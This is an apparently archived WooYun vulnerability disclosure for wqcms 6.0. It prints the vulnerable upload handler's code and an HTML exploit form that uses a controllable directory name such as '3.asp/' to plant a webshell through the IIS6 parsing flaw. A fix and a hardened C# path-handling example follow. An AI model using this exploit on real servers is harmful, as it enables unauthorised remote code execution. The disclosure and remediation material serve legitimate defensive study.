WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online reader -------- http://drop.zone.ci/
2014-06-20: Details reported to the vendor; awaiting vendor handling
2014-06-25: Vendor actively ignored the vulnerability; details opened to third-party security partners
2014-08-19: Details opened to core white hats and experts in related fields
2014-08-29: Details opened to regular white hats
2014-09-08: Details opened to intern white hats
2014-09-15: Details made public
wqcms latest version: obtain a webshell without logging in, default configuration. Please also help review this one: http://wooyun.org/bugs/wooyun-2014-065309/trace/b854f00000a861e49bd22dd330fc350a
Combined with the IIS6 parsing vulnerability this yields a webshell. The source of admin_wqSwfUpload.aspx is as follows:
public void Page_Init(object sender, EventArgs e)
{
    base.mustLogin = false; // no login required
    base.Page_Init(sender, e);
}

public void Page_Load(object sender, EventArgs e)
{
    this.method_1();
}

private void method_1()
{
    string str = string.Format("upload/{0}/", DateTime.Now.ToString("yyyy-MM"));
    string s = string.Empty;
    if (!string.IsNullOrEmpty(base.Request.QueryString["file"])) // "file" is fully controlled by the request
    {
        str = string.Format("{0}/{1}", str, base.Request.QueryString["file"]);
    }
    bool flag = false;
    HttpPostedFile file = base.Request.Files["Filedata"];
    string str5 = Path.GetExtension(file.FileName).ToLower();
    string[] strArray = new string[] { ".gif", ".png", ".jpeg", ".jpg" };
    for (int i = 0; i < strArray.Length; i++)
    {
        if (str5 == strArray[i])
        {
            flag = true;
        }
    }
    if (flag)
    {
        // Checks whether the directory exists and creates it if not. Since we control "file",
        // a directory named 1.asp can be created, and the image uploaded next can then be
        // combined with the parsing vulnerability to obtain a webshell.
        if (!Directory.Exists(base.Server.MapPath(str)))
        {
            Directory.CreateDirectory(base.Server.MapPath(str));
        }
        Random random = new Random();
        string str6 = DateTime.Now.ToString("yyyyMMddHHmm") + random.Next(0x2710).ToString();
        str = string.Format("{0}{1}{2}", str, str6, str5);
        s = str;
        file.SaveAs(base.Server.MapPath(str)); // save
        FileInfo info = new FileInfo(base.Server.MapPath(str));
        if (info.Length < 0x7d000L)
        {
            string input = WbIO.ReadFile(base.Server.MapPath(str));
            string str3 = str5.TrimStart(new char[] { '.' });
            if ((((str3 != "html") && (str3 != "txt")) && ((str3 != "htm") && (str3 != "asp")))
                && (((str3 != "aspx") && (str3 != "php"))
                && Regex.IsMatch(input, "<html|<script|<object", RegexOptions.Singleline | RegexOptions.Compiled | RegexOptions.IgnoreCase)))
            {
                File.Delete(base.Server.MapPath(str));
                return;
            }
        }
        info = null;
    }
    base.Response.StatusCode = 200;
    base.Response.Write(s);
}
For CMS version 6.0 I'll just test locally. The exploit code is as follows:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>upload</title>
</head>
<body>
    <form method="post" action="http://192.168.1.104/admin_wqSwfUpload.aspx?file=3.asp/" enctype="multipart/form-data">
        <input type="file" name="Filedata" />
        <input type="submit" name="tijiao" value="confirm" />
    </form>
</body>
</html>
After uploading:
The file name is still very easy to obtain (the handler writes the saved path back in the response).
Fix: set "file" to a fixed value; do not let users supply it.
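As an added example (not wqcms code, and not the vendor's fix), the following C# shows the shape of a hardened path construction for a handler like admin_wqSwfUpload.aspx. The query parameter is dropped from the path entirely; if a per-request subfolder is really needed it is taken from a strict allowlist with no dots or separators, the stored file name is generated server-side, and a final containment check is run before saving. The names `SafeUploadPath`, `BuildUploadDirectory`, `BuildFileName`, `IsUnderRoot` and the sample inputs are assumptions of this example.

```csharp
using System;
using System.IO;
using System.Text.RegularExpressions;

// Added example (hypothetical helper, not from the wqcms code base).
// The directory is derived from the server clock only; nothing from the
// request is allowed to name a path component.
public static class SafeUploadPath
{
    // Extensions the handler is willing to store.
    private static readonly string[] AllowedExtensions = { ".gif", ".png", ".jpeg", ".jpg" };

    // Optional subfolder allowlist: letters, digits, '-' and '_' only.
    // No dots, so no component can end in ".asp" or any other script
    // extension; no separators, so it cannot climb out of the upload root.
    private static readonly Regex SafeSubfolder = new Regex("^[A-Za-z0-9_-]{1,32}$");

    // Returns the relative upload directory, or null when the optional
    // subfolder (hypothetical replacement for the old "file" parameter)
    // fails the allowlist. Rejecting beats silently sanitising.
    public static string BuildUploadDirectory(DateTime now, string userSubfolder)
    {
        string dir = "upload/" + now.ToString("yyyy-MM") + "/";
        if (string.IsNullOrEmpty(userSubfolder))
            return dir;
        if (!SafeSubfolder.IsMatch(userSubfolder))
            return null;
        return dir + userSubfolder + "/";
    }

    // On-disk name: server-generated stem plus a normalised, allowlisted
    // extension. The client's own file name is never reused.
    public static string BuildFileName(DateTime now, int randomPart, string clientFileName)
    {
        string ext = Path.GetExtension(clientFileName ?? string.Empty).ToLowerInvariant();
        if (Array.IndexOf(AllowedExtensions, ext) < 0)
            return null;
        return now.ToString("yyyyMMddHHmm") + randomPart.ToString() + ext;
    }

    // Containment check to run right before SaveAs: the resolved absolute
    // path must stay below the upload root even if an earlier check slipped.
    public static bool IsUnderRoot(string uploadRoot, string candidatePath)
    {
        string root = Path.GetFullPath(uploadRoot).TrimEnd(Path.DirectorySeparatorChar)
                      + Path.DirectorySeparatorChar;
        string full = Path.GetFullPath(candidatePath);
        return full.StartsWith(root, StringComparison.OrdinalIgnoreCase);
    }

    public static void Main()
    {
        // Constructed sample inputs: the first two are acceptable, the rest
        // are the kinds of values the original handler would have accepted.
        DateTime now = new DateTime(2014, 6, 20, 12, 0, 0);
        string[] samples = { null, "gallery", "3.asp", "../", "a/b" };
        foreach (string s in samples)
        {
            string dir = BuildUploadDirectory(now, s);
            Console.WriteLine("subfolder {0,-8} -> {1}", s ?? "(none)", dir ?? "REJECTED");
        }
        Console.WriteLine(BuildFileName(now, 1234, "photo.JPG"));          // 2014062012001234.jpg
        Console.WriteLine(BuildFileName(now, 1234, "page.asp") ?? "REJECTED");
        string root = Path.Combine(Environment.CurrentDirectory, "upload");
        Console.WriteLine(IsUnderRoot(root, Path.Combine(root, "2014-06", "x.jpg")));   // True
        Console.WriteLine(IsUnderRoot(root, Path.Combine(root, "..", "web.config")));    // False
    }
}
```

The point of the example is that the extension allowlist in the original handler was not the weak spot; the directory name was. Checking the stored file name alone cannot help when a user-supplied directory component is what the web server's parser keys on, so the directory must be fixed or strictly allowlisted and the full path checked against the upload root before the file is written.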
Severity: no impact (vendor ignored)
Ignored at: 2014-09-15 09:06
None yet